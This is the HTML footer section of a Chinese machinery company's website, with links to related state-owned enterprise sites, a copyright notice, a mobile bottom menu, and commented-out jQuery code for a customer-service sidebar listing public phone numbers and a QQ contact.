                <style>@media screen and (min-width: 1025px) { #newsList_style_18_1561899198569 .sumary_list .newPic{width: 0px;} #newsList_style_18_1561899198569 .sumary_list .newCont{width: calc(100% - 0px - 10px);} #newsList_style_18_1561899198569 .sumary_list .newCont{width: 100%;} } @media screen and (min-width: 640px) and (max-width: 1024px) { #newsList_style_18_1561899198569 .sumary_list .newPic{width: 0px;} #newsList_style_18_1561899198569 .sumary_list .newCont{width: calc(100% - 0px - 10px);} #newsList_style_18_1561899198569 .sumary_list .newCont{width: 100%;} } @media screen and (max-width: 640px) { } /* 新分页 */ #newsList_style_18_1561899198569 .page_btn{ font-size:14px; text-align: center;} #newsList_style_18_1561899198569 .page_btn .all_page{ display:inline-block; margin:0 10px; } #newsList_style_18_1561899198569 .page:hover{ background:red; color:white; cursor:pointer;} #newsList_style_18_1561899198569 .page_btn .cur{ background:red; color:white; cursor:pointer;} #newsList_style_18_1561899198569 .submit_div{ display: inline-block; } #newsList_style_18_1561899198569 .page_btn input{ width:50px; margin:0 5px;} #newsList_style_18_1561899198569 .page_btn input:hover{ cursor:default; background:white; color:#333;} #newsList_style_18_1561899198569 .page_submit{margin-left:5px;} #newsList_style_18_1561899198569 .page{display:inline-block; border:none; background:white; text-align: center; width:auto; padding:0 15px; margin:0 .5px; height:auto; line-height:35px; box-sizing: border-box; -webkit-box-sizing: border-box; border:1px solid #e5e5e5;} @media screen and (max-width:640px) { #newsList_style_18_1561899198569 .page_btn{ font-size:12px; } #newsList_style_18_1561899198569 .submit_div{ display:none; } } #newsList_style_18_1561899198569 .page{width:auto; margin:0 5px 10px 5px; border-radius:5px; } @media screen and (max-width:640px) { #newsList_style_18_1561899198569 .page{line-height:30px; padding:0 13px;} }</style></div>
            </div>
            <div id="div_blank_new01_1561907426813" class="view blank_new01 div  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
              <div names="div" class="view_contents">
                <div class="blank_new01">
                  <div class="roundcs modSet"></div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <div id="div_a_includeBlock_1556186891752" class="view a_includeBlock div  none includeView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="div" class="view_contents">
            <div id="text_style_01_1556186891867" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1" style="color:#fff;width: auto;padding: 0 5px">
              <div names="text" class="view_contents mkan" style="color:#fff;width: auto;padding: 0 5px">Bidding information</div></div>
            <div id="text_style_01_1556186891870" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
              <div names="text" class="view_contents"><!-- Site navigation --></div></div>
            <div id="div_blank_new01_1561907431573" class="view blank_new01 div  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
              <div names="div" class="view_contents">
                <div class="blank_new01">
                  <div class="roundcs modSet"></div>
                </div>
              </div>
            </div>

            <div style="margin-top: 50px;">
                          </div>

          </div>
        </div>
      </div>
    </div>
    <div id="layout_1556187188964" class="layout  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
      <div class="view_contents"></div>
    </div>

    <div id="layout_1556246197396" class="layout  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
      <div class="view_contents">
        <div id="text_style_01_1556246249192" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="text" class="view_contents">Link All：</div></div>
        <div id="flink_style_01_1561905691147" class="view style_01 flink  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="flink" class="view_contents">
            <script></script>
            <ul class="style_01 cell-box equal_wide">
    
            
              <li class="cell modSet">
                <div class="content ">
                  <a class="connectName textSet" href="http://www.sasac.gov.cn" target="_blank">国有资产监督委员会</a></div>
              </li>
    
            
              <li class="cell modSet">
                <div class="content ">
                  <a class="connectName textSet" href="http://www.xxcig.com/" target="_blank">新兴际华集团</a></div>
              </li>
    
            
              <li class="cell modSet">
                <div class="content ">
                  <a class="connectName textSet" href="http://www.xinxing-pipes.com/" target="_blank">新兴铸管股份</a></div>
              </li>
    
            
              <li class="cell modSet">
                <div class="content ">
                  <a class="connectName textSet" href="http://www.xxzgjt.cn/" target="_blank">新兴重工集团</a></div>
              </li>
    
            
              <li class="cell modSet">
                <div class="content ">
                  <a class="connectName textSet" href="http://www.whxxzg.com/" target="_blank">芜湖新兴铸管</a></div>
              </li>
    
            
              <li class="cell modSet">
                <div class="content ">
                  <a class="connectName textSet" href="http://www.hsxxgy.com/" target="_blank">黄石新兴管业</a></div>
              </li>
    
            
              <li class="cell modSet">
                <div class="content ">
                  <a class="connectName textSet" href="http://www.chuanjian.com" target="_blank">川建管道公司</a></div>
              </li>
    
            
    
              <div class="clear"></div>
            </ul>
            <script type="text/javascript" src="/static/index/masonry.pkgd.min.js"></script>
            <script type="text/javascript">// $(function () {
              //     $('#flink_style_01_1561905691147 .cell-box').masonry({
              //         // options
              //         itemSelector: '.cell'
              //     });
              // });
              </script>
          </div>
        </div>
      </div>
    </div>




    <div id="comm_layout_footer" class="layout  none" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
      <div class="view_contents">
        <div id="text_style_01_1556256721234" class="view style_01 text  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="text" class="view_contents">Copyright © 2025 Hubei Xinxing Quanli Machinery Co., Ltd All Rights Reserved   <a href="http://beian.miit.gov.cn" rel="nofollow">鄂ICP备19025165号-1</a></div></div>
        <!-- <div id="qqol_style_01_1565572824433" class="view style_01 qqol  none lockHeightView" data-wow-duration="0s" data-wow-delay="0s" data-wow-offset="0" data-wow-iteration="1">
          <div names="qqol" class="view_contents">
            <script>/*

 * ***************************************************************

 * 片段列表类

 */

              function FragmentList(config) {

                this._default = {

                  'prefix': 'fragment-',

                  'css': {}

                };

                config = $.extend(true, this._default, config);

                this.config = config;

                this.list = [];

                this.object = $('<div></div>');

                // 执行配置
                this.init(config);

              }

              /*

 * 初始化

 */

              FragmentList.prototype.init = function(config) {

                config.css && this.object.css(config.css);

              };

              /*

 * 添加

 */

              FragmentList.prototype.append = function(fragment) {

                this.list.push(fragment);

              };

              /*

 * 获取jquery对象

 */

              FragmentList.prototype.get = function() {

                this.object.addClass(this.config.prefix + 'list').children().remove();

                for (var i = 0,
                len = this.list.length,
                html = ''; i < len; ++i) {

                  html += this.list[i].html();

                }

                return this.object.html(html);

              };

              /*

 * 输出

 */

              FragmentList.prototype.html = function() {

                return this.get().prop('outerHTML');

              };

              /*

 * ***************************************************************

 * 片段类

 */

              Fragment.prototype.prefix = 'fragment-';

              function Fragment(config) {

                (!config.init || Util.prototype.type(config.init) != 'function') && (config.init = function() {});

                ! config.html && (config.html = '<div></div>');

                this._default = {

                  'name': 'item'

                };

                config = $.extend(true, this._default, config);

                // 创建jquery对象
                config.data && (config.html = Util.prototype.replace(config.html, Util.prototype.toArray(config.data)));

                this.object = $(config.html).addClass((config.name != 'item' ? this.prefix + 'item': '') + ' ' + this.prefix + config.name);

                config.init(this.object);

                delete config.html; // jquery对象创建后, config.html 不再使用
                this.config = config;

                // 执行配置
                this.init(config);

              }

              /*

 * 复制

 */

              Fragment.prototype.clone = function() {

                return new Fragment($.extend(true, {},
                this.config));

              };

              /*

 * 初始化

 */

              Fragment.prototype.init = function(config) {

                config.css && this.object.css(config.css);

              };

              /*

 * 修改样式

 */

              Fragment.prototype.css = function(css) {

                css && this.object.css(css);

                return this;

              };

              /*

 * 输出

 */

              Fragment.prototype.html = function() {

                return this.object.prop('outerHTML');

              };

              /*

 * 使用指定数据更新自己

 */

              Fragment.prototype.data = function(data) {

                this.object.html(Util.prototype.replace(this.html(), Util.prototype.toArray(data)));

                return this;

              };

              /*

 * ***************************************************************

 * 边栏类

 */

              function Sidebar(config) {

                this._default = {

                  // 默认配置, 常量, 不应该修改, 对象初始化时可覆盖
                  'template': 'sidebar',

                  'expand': true,
                  // 默认展开还是隐藏
                  'css': undefined,

                  'main': {
                    'width': '120px',
                    'position': 'right'
                  },

                  'border': {
                    'width': '1px',
                    'color': '#ccc',
                    'radius': '2px'
                  },

                  'button': {
                    'width': '26px',
                    'color': '#333',
                    'font-size': '12px',
                    'background-color': '#ececec',
                    'radius': '5px'
                  },

                  'close': {
                    'hide': false,
                    'height': '25px',
                    'font-size': '12px',
                    'padding': '0 .6em 0 .3em'
                  },

                  'show': {
                    'start': undefined,
                    'end': undefined
                  },
                  // 显示开始和结束时要执行的函数
                  'end': {
                    'start': undefined,
                    'end': undefined
                  } // 隐藏开始和结束时要执行的函数
                };

                config = $.extend(true, this._default, config);

                this.config = config;

                // dom 结构
                var temp = $('.' + config.template + ':first');

                temp.hide();

                this.main = temp.clone().removeClass(config.template).show();

                this.main.data('instance', this); // dom 结构的 data 中保存类对象
                config.css && this.main.addClass(config.css);

                // 主要属性
                this.width = config.main.width;

                this.position = config.main.position;

                this.main.addClass(this.position);

                this.position_rev = this.position == 'right' ? 'left': 'right';

                this.wrapper = this.main.children('.wrapper');

                this._close = this.wrapper.children('.close');

                this.button = this.main.children('.button');

                // 子元素的 dom 结构的 data 中保存类对象
                this._close.data('parent', this);

                this.button.data('parent', this);

                // 执行配置
                this.init(config);

              }

              /*

 * 初始化

 */

              Sidebar.prototype.init = function(config) {

                this.initMain();

                this.initWrapper(config);

                this.initButton(config);

                // 垂直居中后, 移动到body最后
                this.verticalCenter().appendTo('body');

                config.expand ? this.show(false) : this.hide(false);

                this.main.show();

                // 存储所有的对象到window中 (后期会使用)
                ! window.online_service_list && (window.online_service_list = []);

                window.online_service_list.push(this);

                $(window).resize(this.onWindowResize);

              };

              /*

 * 初始化 - main

 */

              Sidebar.prototype.initMain = function() {

                this.main.hide().css({

                  'height': 'auto',

                  'position': 'fixed',

                  'z-index': '100000000',

                  'top': '0px',

                  'width': this.width

                });

                this.main.css(this.position, '0px');

                // 移入移出时
                this.main.hover(

                function() {

                  $(this).data('instance').show();

                },

                function() {

                  if (!$(this).hasClass('animate-showing')) {

                    $(this).data('instance').hide();

                  }

                }

                );

              };

              /*

 * 初始化 - wrapper

 */

              Sidebar.prototype.initWrapper = function(config) {

                this.wrapper.css({

                  'border': config.border.width + ' solid ' + config.border.color,

                  'border-radius': config.border.radius,

                  '-moz-border-radius': config.border.radius

                });

                this._close.css({

                  'display': config.close.hide ? 'none': 'block',

                  'position': 'absolute',

                  'top': '0px',

                  'right': '0px',

                  'height': config.close.height,

                  'line-height': config.close.height,

                  'font-size': config.close['font-size'],

                  'padding': config.close.padding,

                  'cursor': 'pointer'

                }).click(function() {

                  var instance = $(this).data('parent');

                  Sidebar.prototype.hide.call(instance);

                  if (typeof($("img").lazyload) == "function") {

                    //异步加载图片
                    setTimeout(function() {

                      $("img").lazyload({
                        effect: "fadeIn",
                        threshold: 0,
                        failure_limit: 20,
                        skip_invisible: false
                      });

                    },
                    500);

                  }

                }).attr({
                  'onselectstart': 'return false',
                  'unselectable': 'on'
                }); // [兼容]禁止选择文本
              };

              /*

 * 隐藏Sidebar

 * animate: 是否带动画

 */

              Sidebar.prototype.hide = function(animate) {

                animate === undefined && (animate = true);

                var instance = this,
                width = '-' + this.width,
                end = this.position == 'right' ? {
                  right: width
                }: {
                  left: width
                },

                btn_width = '-' + instance.config.button.width,
                btn_end = instance.position == 'right' ? {
                  left: btn_width
                }: {
                  right: btn_width
                };

                instance.onHide('start');

                if (animate) {

                  instance.main.animate(end, 'fast',
                  function() {

                    instance.button.show().animate(btn_end, 'fast');

                    instance.onHide('end');

                  });

                } else {

                  instance.main.css(end);

                  instance.button.show().css(btn_end);

                  instance.onHide('end');

                }

              };

              /*

 * 隐藏Sidebar开始和结束时

 */

              Sidebar.prototype.onHide = function(status) {

                var func;

                if (this.config.hide) {

                  switch (status) {

                  case 'start':

                    Util.prototype.type(func = this.config.hide.start) == 'function' && func(); // 执行自定义函数
                    break;

                  case 'end':

                    Util.prototype.type(func = this.config.hide.end) == 'function' && func(); // 执行自定义函数
                    break;

                  }

                }

              };

              /*

 * 初始化 - button

 */

              Sidebar.prototype.initButton = function(config) {

                var width = config.button.width;

                this.button.hide().css({

                  'position': 'absolute',

                  'top': '0%',

                  'width': width,

                  'line-height': '1.35em',

                  'padding': '.5em 0',

                  'font-size': config.close['font-size'],

                  'color': config.button.color,

                  'background-color': config.button['background-color'],

                  'cursor': 'pointer',

                  'word-wrap': 'break-word',

                  'word-break': 'break-all'

                });

                var radius = config.button.radius;

                if (this.position == 'right') {

                  this.button.css({

                    'border-top-left-radius': radius,

                    'border-bottom-left-radius': radius

                  });

                } else {

                  this.button.css({

                    'border-top-right-radius': radius,

                    'border-bottom-right-radius': radius

                  });

                }

                this.button.css(this.position_rev, '0px');

                // 点击时
                this.button.click(function() {

                  var instance = $(this).data('parent');

                  Sidebar.prototype.show.call(instance);

                }).attr({
                  'onselectstart': 'return false',
                  'unselectable': 'on'
                }); // [兼容]禁止选择文本
              };

              /*

 * 显示Sidebar

 * animate: 是否带动画

 */

              Sidebar.prototype.show = function(animate) {

                animate === undefined && (animate = true);

                var instance = this,
                end = instance.position == 'right' ? {
                  right: 0
                }: {
                  left: 0
                };

                instance.onShow('start');

                if (animate) {

                  instance.onAnimate('showing');

                  instance.main.animate(end, 'fast',
                  function() {

                    instance.onAnimate();

                    instance.button.hide(); // Bug修复: 额外隐藏一次
                    instance.onShow('end');

                  });

                } else {

                  instance.main.css(end);

                  instance.onShow('end');

                }

                // 显示开始后, 不管是否有动画, 按钮应该马上隐藏
                instance.button.hide();

                instance.button.css(instance.position_rev, '0px');

              };

              /*

 * 显示Sidebar开始和结束时

 */

              Sidebar.prototype.onShow = function(status) {

                var func;

                if (this.config.show) {

                  switch (status) {

                  case 'start':

                    Util.prototype.type(func = this.config.show.start) == 'function' && func(); // 执行自定义函数
                    break;

                  case 'end':

                    Util.prototype.type(func = this.config.show.end) == 'function' && func(); // 执行自定义函数
                    break;

                  }

                }

              };

              /*

 * 设置实时动画状态

 * status: 为空时表示动画结束

 */

              Sidebar.prototype.onAnimate = function(status) {

                Util.prototype.removeClass(this.main, 'animate-');

                status && this.main.addClass('animate-' + status);

              };

              /*

 * 窗口大小改变时

 */

              Sidebar.prototype.onWindowResize = function() {

                for (var i = 0,
                len = window.online_service_list.length; i < len; ++i) {

                  window.online_service_list[i].verticalCenter();

                }

              };

              /*

 * 在窗口垂直居中

 */

              Sidebar.prototype.verticalCenter = function() {

                var h1 = this.main.height(),
                h2 = $(window).height();

                if (h1 && h2) {

                  this.main.css('top', ((h2 - h1) / 2) + 'px');

                }

                return this.main;

              };

              /*

 * 添加内容

 */

              Sidebar.prototype.append = function(obj) {

                this.wrapper.append(obj);

                this.verticalCenter();

              };

              /*

 * ***************************************************************

 * 工具类

 */

              function Util() {

}

              /*

 * 返回对象类型

 */

              Util.prototype.type = function(obj) {

                var type = obj === undefined ? 'undefined': (obj === null ? 'null': undefined); // 兼容旧版js解析器
                return type ? type: Object.prototype.toString.call(obj).slice(8, -1).toLowerCase();

              };

              /*

 * 检测对象类型

 */

              Util.prototype.is = function(obj, type) {

                var cls = this.type(obj);

                return obj !== undefined && obj !== null && cls.toLowerCase() === type.toLowerCase();

              };

              /*

 * 属性扩展( 增强版 )

 * 注意: 一般深度复制, 可直接使用 $.extend(true, target, source)

 */

              Util.prototype.extend = function(target, source, is_deep, is_add) {

                is_deep === undefined && (is_deep = true); // 如果值也是对象, 是否对值也调用extend
                is_add === undefined && (is_add = true); // 如果目标对象中没有源对象的键, 是否允许新增键值
                for (var p in source) {

                  if (source.hasOwnProperty(p) && (is_add || target.hasOwnProperty(p))) {

                    // 执行extend
                    if (is_deep && this.is(target[p], 'object') && this.is(source[p], 'object')) {

                      this.extend(target[p], source[p]);

                    } else {

                      target[p] = source[p];

                    }

                  }

                }

                return target;

              };

              /*

 * 删除class( 删除指定名称的class和所有以指定名称开头的class )

 */

              Util.prototype.removeClass = function(obj, rm) {

                obj.attr('class',
                function() {

                  var regExp = new RegExp(rm + '\\S*', 'g');

                  return Util.prototype.clear($(this).attr('class').replace(regExp, ''));

                });

                return obj;

              };

              /*

 * 删除前后空白

 */

              Util.prototype.trim = function(s) {

                return s.replace(/(^\s*)|(\s*$)/g, '');

              };

              /*

 * 合并中间多个空白为一个

 */

              Util.prototype.clear = function(s) {

                return s.replace(/(^\s*)|(\s*$)|(\s{2,})/g, '');

              };

              /*

 * 对象转数组

 */

              Util.prototype.toArray = function(obj) {

                var array = [],
                p,
                item;

                for (p in obj) {

                  if (obj.hasOwnProperty(p)) {

                    item = [p];

                    item.push(this.is(obj[p], 'object') ? this.toArray(obj[p]) : obj[p]);

                    array.push(item);

                  }

                }

                return array;

              };

              /*

 * 使用指定的键值数组替换一个字符串

 * 备注: 字符串中键以{{}}标记

 * 备注: data: 二维数组, 一维数组的每一项是一个长度为二的内层数组, 内层数组的第一项为键, 第二项为值

 */

              Util.prototype.replace = function(s, data) {

                var i, len, reg_str = [],
                reg;

                for (i = 0, len = data.length; i < len; ++i) {

                  reg_str.push('({{' + data[i][0] + '}})');

                }

                // 正则替换
                reg = new RegExp(reg_str.join('|'), 'g');

                return s.replace(reg, replace);

                // 执行替换的函数
                function replace() {

                  // arguments 中包含的是: 字符串中当前位置匹配到的字符串, 第0个()匹配到的字符串, ..., 第n-1个()匹配到的字符串, 当前匹配的位置, 整个字符串
                  // 从索引为1开始, 第一个不为undefined的项的索引值减一即为匹配到的键的索引
                  for (var i = 1,
                  len = arguments.length; i < len; ++i) {

                    if (arguments[i] !== undefined) {

                      return data[--i][1];

                    }

                  }

                }

              };</script>
            <div class="online-service online-template online-service-style01" style="display: none;">
              <div class="wrapper">
                <div class="close">×</div></div>
              <div class="button">
                <div>
                  <img style="margin-bottom: 1px; width: 12px;" alt="&lt;" src="/static/index/member-1-white.png">在线客服
                  <img style="margin-top: 3px; width: 12px;" alt="&lt;" src="/static/index/links-6-white-rev.png"></div></div>
            </div>
            <script type="application/javascript">function remove_qqol_qqol_style_01_1565572824433() {
                $('body > .online-service.qqol-qqol_style_01_1565572824433').remove();
              }
              // 创建在线客服
              $(function() {
                // 清理旧的
                remove_qqol_qqol_style_01_1565572824433();

                // 创建边栏
                var sidebar = new Sidebar({
                  'template': 'online-template',
                  'css': 'qqol-qqol_style_01_1565572824433',
                  'expand': false,
                  'main': {
                    'width': '200px',
                    'position': 'right'
                  },
                  'border': {
                    'color': '#009fe9',
                    'width': '3px',
                    'radius': '10px'
                  },
                  'button': {
                    'color': '#fff',
                    'background-color': '#009fe9',
                    'radius': '5px'
                  },
                  'close': {
                    'hide': false
                  }
                });

                // 片段模板
                var qqOnlineStr = '<div class="clearfix">' + '<a class="qq-btn" target="_blank" href="//wpa.qq.com/msgrd?v=3&uin={{qq}}&site=qq&menu=yes">' + '<img border="0" src="//wpa.qq.com/pa?p=2:{{qq}}:{{style}}" alt="{{title}}" title="{{title}}"  ' + 'onerror="javascript:this.src=\'//wpa.qq.com/pa?p=2:123456789:{{style}}\';">' + '{{text}}</a></div>'; // 图标不能显示时, 更换QQ号码让其显示
                // 创建片段
                Fragment.prototype.prefix = 'ol-';

                // 创建片段列表
                var fragmentList = new FragmentList({
                  'prefix': 'ol-',
                  'css': {
                    'padding': '0 12px'
                  }
                });
                fragmentList.append(new Fragment({
                  'name': 'text',
                  'html': '<div>电话：0714-5375554</div>',
                  'css': {
                    'margin': '.5em 0'
                  }
                }));
                fragmentList.append(new Fragment({
                  'name': 'text',
                  'html': '<div>客服1：0714-53755044</div>',
                  'css': {
                    'margin': '.5em 0'
                  }
                }));
                fragmentList.append(new Fragment({
                  'name': 'text',
                  'html': '<div>客服2：0714-5375522</div>',
                  'css': {
                    'margin': '.5em 0'
                  }
                }));
                fragmentList.append(new Fragment({
                  'name': 'qq-online',
                  'html': qqOnlineStr,
                  'data': {
                    'qq': '185006359',
                    'style': 3,
                    'title': 'QQ在线',
                    'text': '客服一'
                  },
                  'css': {
                    'margin': '.5em 0'
                  }
                }));
                // 添加到边栏
                var list = fragmentList.get(); ! list.children().length && list.html('<p>内容列表为空！</p>');
                sidebar.append(list);
                if (typeof($("img").lazyload) == "function") {
                  $("img").lazyload({
                    effect: "fadeIn",
                    threshold: 0,
                    failure_limit: 20,
                    skip_invisible: false
                  });
                }
              });</script>
            <script type="application/javascript">// 对输入内容中的尖括号、引号等进行转义
              function html_encode(str) {
                var s = "";
                if (str.length == 0) return "";
                s = str.replace(/&/g, "&amp;");
                s = s.replace(/</g, "&lt;");
                s = s.replace(/>/g, "&gt;");
                s = s.replace(/ /g, "&nbsp;");
                s = s.replace(/\'/g, "&#39;");
                s = s.replace(/\"/g, "&quot;");
                s = s.replace(/\n/g, "<br>");
                return s;
              }
              function html_decode(str) {
                var s = "";
                if (str.length == 0) return "";
                s = str.replace(/&amp;/g, "&");
                s = s.replace(/&lt;/g, "<");
                s = s.replace(/&gt;/g, ">");
                s = s.replace(/&nbsp;/g, " ");
                s = s.replace(/&#39;/g, "\'");
                s = s.replace(/&quot;/g, "\"");
                s = s.replace(/<br>/g, "\n");
                return s;
              }</script>
          </div>
        </div> -->
      </div>
    </div>




    <div class="bottomMenu 123">
      <ul>
        <li style="height:100%;padding-top:2px;">
          <a href="/index.html" class="" style="">
            <div class="menuItem">
              <div class="menuIco">
                <img src="/static/index/20190701005558376.png" alt=""></div>
              <input type="hidden" class="menuIcon" value="">
              <input type="hidden" class="menuColor" value="">
              <div class="menuName" style="color:#666666;">网站首页</div></div>
          </a>
          <div class="submenuItems" style="display:none;"></div>
        </li>
        <script>$(function() {
            var lang = 0;
            if (typeof(Default_isFT) !== 'undefined') {
              if (lang == '0') {
                lang = Default_isFT;
                if (BodyIsFt == '0') {
                  lang = BodyIsFt;
                } else if (BodyIsFt == '1') {
                  lang = BodyIsFt;
                }
              }
              $('.bottomMenu a').each(function() {
                var hrefstr = $(this).attr('href');
                var laststr = hrefstr.substring(hrefstr.length - 7);
                if (laststr == 'langid=') {
                  hrefstr = hrefstr + lang;
                  $(this).attr('href', hrefstr)
                }
              })
            }
          })</script>
        <li style="height:100%;padding-top:2px;">
          <a href="/about.html" class="" style="">
            <div class="menuItem">
              <div class="menuIco">
                <img src="/static/index/20190701005156639.png" alt=""></div>
              <input type="hidden" class="menuIcon" value="">
              <input type="hidden" class="menuColor" value="">
              <div class="menuName" style="color:#666666;">公司概况</div></div>
          </a>
          <div class="submenuItems" style="display:none;"></div>
        </li>
        <script>$(function() {
            var lang = 0;
            if (typeof(Default_isFT) !== 'undefined') {
              if (lang == '0') {
                lang = Default_isFT;
                if (BodyIsFt == '0') {
                  lang = BodyIsFt;
                } else if (BodyIsFt == '1') {
                  lang = BodyIsFt;
                }
              }
              $('.bottomMenu a').each(function() {
                var hrefstr = $(this).attr('href');
                var laststr = hrefstr.substring(hrefstr.length - 7);
                if (laststr == 'langid=') {
                  hrefstr = hrefstr + lang;
                  $(this).attr('href', hrefstr)
                }
              })
            }
          })</script>
        <li style="height:100%;padding-top:2px;">
          <a href="/news/353.html" class="" style="">
            <div class="menuItem">
              <div class="menuIco">
                <img src="/static/index/20190428144824649.png" alt=""></div>
              <input type="hidden" class="menuIcon" value="">
              <input type="hidden" class="menuColor" value="">
              <div class="menuName" style="color:#666666;">新闻中心</div></div>
          </a>
          <div class="submenuItems" style="display:none;"></div>
        </li>
        <script>$(function() {
            var lang = 0;
            if (typeof(Default_isFT) !== 'undefined') {
              if (lang == '0') {
                lang = Default_isFT;
                if (BodyIsFt == '0') {
                  lang = BodyIsFt;
                } else if (BodyIsFt == '1') {
                  lang = BodyIsFt;
                }
              }
              $('.bottomMenu a').each(function() {
                var hrefstr = $(this).attr('href');
                var laststr = hrefstr.substring(hrefstr.length - 7);
                if (laststr == 'langid=') {
                  hrefstr = hrefstr + lang;
                  $(this).attr('href', hrefstr)
                }
              })
            }
          })</script>
        <li style="height:100%;padding-top:2px;">
          <a href="/news/413.html" class="" style="">
            <div class="menuItem">
              <div class="menuIco">
                <img src="/static/index/20190428144744677.png" alt=""></div>
              <input type="hidden" class="menuIcon" value="">
              <input type="hidden" class="menuColor" value="">
              <div class="menuName" style="color:#666666;">党建专栏</div></div>
          </a>
          <div class="submenuItems" style="display:none;"></div>
        </li>
        <script>$(function() {
            var lang = 0;
            if (typeof(Default_isFT) !== 'undefined') {
              if (lang == '0') {
                lang = Default_isFT;
                if (BodyIsFt == '0') {
                  lang = BodyIsFt;
                } else if (BodyIsFt == '1') {
                  lang = BodyIsFt;
                }
              }
              $('.bottomMenu a').each(function() {
                var hrefstr = $(this).attr('href');
                var laststr = hrefstr.substring(hrefstr.length - 7);
                if (laststr == 'langid=') {
                  hrefstr = hrefstr + lang;
                  $(this).attr('href', hrefstr)
                }
              })
            }
          })</script>
      </ul>
    </div>




    <script>$(function() {
        $(".showSubMenu").click(function() {
          $(this).next().toggle();
          $(this).parent("li").siblings("li").children(".showSubMenu").next().css("display", "none");
        });
        var bottomLen = $(".bottomMenu > ul > li > a").length;
        var url = window.location.pathname;
        var loc = url.substring(url.lastIndexOf("/") + 1, url.length);
        for (var i = 0; i < bottomLen; i++) {
          var curObj = $(".bottomMenu ul li a").eq(i);
          if (loc == curObj.attr("href")) {
            var img = curObj.children(".menuItem").children(".menuIco").children("img").attr("src");
            var menuIcon = curObj.children(".menuItem").children(".menuIcon").val();
            var menuColor = curObj.children(".menuItem").children(".menuColor").val();
            var menuName = curObj.children(".menuItem").children(".menuName").html();
            if (menuIcon != "") {
              curObj.children(".menuItem").children(".menuIco").children("img").attr("src", menuIcon);
            }
            if (menuColor != "") {
              curObj.children(".menuItem").children(".menuName").css("color", menuColor);
            }
          }
        }
      });
      $(window).resize(function() {
        if ($("body").width() < 640) {
          var bottomHeight = $(".bottomMenu").height();
          $("body").css("padding-bottom", bottomHeight + "px");
        } else {
          $("body").css("padding-bottom", "0px");
        }
      });</script>
    <script>$(function() {
        sendBatch(batchArr);
      });</script>
    <script type="text/javascript" src="/static/index/js.js" charset="utf-8"></script>
    <!-- <div class="online-service online-service-style01 qqol-qqol_style_01_1565572824433 right" style="display: block; height: auto; position: fixed; z-index: 100000000; top: 308.5px; width: 200px; right: -200px;">
      <div class="wrapper" style="border: 3px solid rgb(0, 159, 233); border-radius: 10px;">
        <div class="close" onselectstart="return false" unselectable="on" style="display: block; position: absolute; top: 0px; right: 0px; height: 25px; line-height: 25px; font-size: 12px; padding: 0px 0.6em 0px 0.3em; cursor: pointer;">×</div>
        <div class="ol-list" style="padding: 0px 12px;">
          <div class="ol-item ol-text" style="margin: 0.5em 0px;">电话：0714-5375554</div>
          <div class="ol-item ol-text" style="margin: 0.5em 0px;">客服1：0714-53755044</div>
          <div class="ol-item ol-text" style="margin: 0.5em 0px;">客服2：0714-5375522</div>
          <div class="clearfix ol-item ol-qq-online" style="margin: 0.5em 0px;">
            <a class="qq-btn" target="_blank" href="http://wpa.qq.com/msgrd?v=3&amp;uin=185006359&amp;site=qq&amp;menu=yes">
              <img border="0" src="/static/index/pa" alt="QQ在线" title="QQ在线" onerror="javascript:this.src=&#39;//wpa.qq.com/pa?p=2:123456789:3&#39;;">客服一</a></div>
        </div>
      </div>
      <div class="button" onselectstart="return false" unselectable="on" style="position: absolute; top: 0%; width: 26px; line-height: 1.35em; padding: 0.5em 0px; font-size: 12px; color: rgb(255, 255, 255); background-color: rgb(0, 159, 233); cursor: pointer; word-wrap: break-word; word-break: break-all; border-top-left-radius: 5px; border-bottom-left-radius: 5px; left: -26px;">
        <div>
          <img style="margin-bottom:1px; width:12px" alt="&lt;" src="/static/index/member-1-white.png">在线客服
          <img style="margin-top:3px; width:12px" alt="&lt;" src="/static/index/links-6-white-rev.png"></div></div>
    </div> -->








</html>